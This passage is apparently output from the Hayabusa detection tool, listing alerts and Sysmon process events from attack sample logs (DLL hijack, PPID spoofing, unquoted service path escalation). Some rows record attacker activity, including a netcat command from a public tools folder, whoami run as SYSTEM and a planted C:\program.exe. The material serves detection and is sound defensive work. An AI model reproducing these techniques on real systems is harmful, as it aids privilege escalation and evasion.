7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:06.990 
+09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 
747F3D96-0880-5E76-0000-001014202B00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 
747F3D96-8AEC-5E76-0000-00101DDB8003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 
747F3D96-B763-5EA4-0000-00106A480000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe 
| LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.487 
+09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p 
-s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL 
SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL 
